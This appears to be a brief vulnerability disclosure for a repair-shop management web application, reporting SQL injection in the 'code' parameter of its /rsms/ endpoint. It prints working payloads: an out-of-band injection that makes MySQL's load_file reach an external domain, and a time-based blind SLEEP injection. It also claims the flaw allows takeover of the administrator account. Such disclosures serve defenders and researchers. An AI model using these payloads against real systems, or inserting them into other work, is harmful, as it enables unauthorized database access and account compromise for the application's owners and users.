RSMS-1.0
Vendor
Description:
The code parameter from /rsms/ node app, on Computer and Mobile Repair Shop Management-1.0 appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\kie'))+' was submitted in the code parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can take administrator account control on this system.
[+] Payloads:
---
Parameter: code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_status&code=202778'+(select load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+'' AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj
---
